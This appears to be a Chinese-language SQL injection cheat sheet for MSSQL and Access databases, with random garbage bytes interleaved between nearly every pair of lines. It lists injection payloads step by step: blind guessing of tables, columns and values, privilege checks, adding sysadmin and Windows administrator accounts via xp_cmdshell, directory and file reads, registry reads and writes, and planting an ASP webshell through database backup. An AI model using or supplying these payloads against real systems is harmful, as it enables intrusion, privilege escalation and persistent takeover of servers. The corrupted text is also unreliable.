1.判断是否有注入;and 1=1 ;and 1=2 d5x>kO�'[l
2.初步判断是否是mssql ;and user>0 )38M~�/ ^l
T|c9S�wu�r
3.注入参数是字符'and [查询条件] and ''=' R�NJU�A^{�
1�YklPMx6�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' Viu+#�J;�l
��NN��t,J;
5.判断数据库系统 sPee"�9�%,
r95l�.�v�
;and (select count(*) from sysobjects)>0 mssql � M�R/�8��
�:.+?v*%;n
;and (select count(*) from msysobjects)>0 access v=~�=Q�*\l
AV0�C9a/td
�~$zod�rS9
Q6?}�/�p��
6.猜数据库 ;and (select Count(*) from [数据库名])>0 F_Q?0 Do0'
�CS:m�O�|�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 '�5Zt�B��<
+�U%U3tAvs
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 -�F�+dRzxH
+N9(o+Ur�U
9.(1)猜字段的ascii值(access) r�`Qz�n" H
��mv�1_vF:
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 95,{40;�X7
[S}o[���v\
(2)猜字段的ascii值(mssql) 6E!C��xXUX
!�zw)! rV=
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 s��^/<6kwO
��n%V��t r
10.测试权限结构(mssql) 9M�)N2+hkZ
+M+h��t��
*S).@j\{W
�CaZ{UGokL
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- E�H'?wh|Yp
�>�qJRp�O�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- x+}6qfc$9k
yK +&�1U2`
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- b@OL��!?JP
����QY,.|�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- *3hqz<p4:
4s<��*rKm~
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �EH��T5�Gf
v'�C�`;�I�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �OBF2�?[V~
2W�jQ-mM�#
;and 1=(select IS_MEMBER('db_owner'));-- $18|@�\Znj
�#'Q_eB�X
:@TfhQV_=Q
6�#�+&_�#9
11.添加mssql和系统的帐户 Xj;nh?\�u
N#�')Qz:�P
;exec master.dbo.sp_addlogin username;-- c�H()Ze-B�
;exec master.dbo.sp_password null,username,password;-- K�q|L:�Z�
Q(-:)3g[aL
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �$/�%|�0tQ
$=�f�,z�>j
;exec master.dbo.xp_cmdshell 'net user username password zof>S>5>R7
LI�[� w?6B
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- L�����;=<d
<_@� S@t)�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- #msXAy$N3r
J9^RP~>b�s
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �OLc/V�ij;
7F�M�g6z8~
+��I�0?��D
r%hn�l9���
12.(1)遍历目录 )TxAh�az�+
Oslb�t8)U6
;create table dirs(paths varchar(100), id int) iWu$$IV?-
�Akf?BB3bC
;insert dirs exec master.dbo.xp_dirtree 'c:\' �vLW�&/YJ6
B*�A{��@)_
;and (select top 1 paths from dirs)>0 �oc����,a
�#�$xiq�L�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) B��98&JoS�
���]3<�k>?
=��&�~*r��
�h_4o��4�#
(2)遍历目录 �n83,MV?-�
S,�LW/�:,
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �LuS]��D%�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 c *(�]�p�M
��8Letpygm
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 g�4�<�w6eB
Qf�J�?�'�*
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 3k�;*xjv6@
`�#h�d�b=3
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �� L2�[|g~
f{��[U->#^
\w�{�x-�}�
2�~+���_T�
13.mssql中的存储过程 |:�n�4t6��
l9XK;0�R9
xp_regenumvalues 注册表根键, 子键 3!^5a�%u�
_B)�LRD+Hj
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 w�
`6�qT3v
�@a�)
x^d�
xp_regread 根键,子键,键值名 T<06�y3sN
't
\:@�-tQ
;exec xp_regread .��w^M?}dx
Bo8+�u�RF|
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 Rm �1obP
J')Dt]/�9�
xp_regwrite 根键,子键, 值名, 值类型, 值 a9�qB8/Gg[
TjGe���8L:
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 Q4r)TR���,
$:w4_�X5�T
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 &*RJh'o|N(
nC^�?6�il
xp_regdeletevalue 根键,子键,值名 sY!�PXD0Q�
0PD]#�.��+
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 %>}6>n�T#
nY"9"�R\.=
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 M0Dd�rL/
L
.�Y[sQO~%�
;|e��{J��$
iPX�6�r4-�
14.mssql的backup创建webshell ~aa`Y0Ws],
5�F�c�KY�_
use model Zso&.IATng
B�L6��t��>
create table cmd(str image); �C�"_f3[Z�
��t<�sg8U.
insert into cmd(str) values (''); o&)�O&bNJ�
kx�p�$Nn�k
backup database model to disk='c:\l.asp'; c��%w@-n�`
�pUk��i!TA
Dp!3uR�']p
C#[�YDcp�4
15.mssql内置函数 |ZW%+AQ|�
S�C)4u l�%
;and (select @@version)>0 获得Windows的版本号 >K**Sj�VG�
Lzu;"#�pw�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa EU.vw0�}u8
t�Jo,^fdfv
;and (select user_name())>0 爆当前系统的连接用户 �$�8h�^�R#
T1m�'+^?�"
;and (select db_name())>0 得到当前连接的数据库 U�.~,�Bwb
�)�nU�%}Z�
�x�nWCio>M
�ik0�2Q�,J
16.简洁的webshell >�HO{gaRM�
1$oVc�D�Ll
use model Vd^_4uqnV�
L�yO���,�]
create table cmd(str image); &x19]?�D"+
�F��Ld��O�
insert into cmd(str) values (''); �\)�859x&(
"|�w.�.%Wc
backup database model to disk='g:\wwwtest\l.asp';
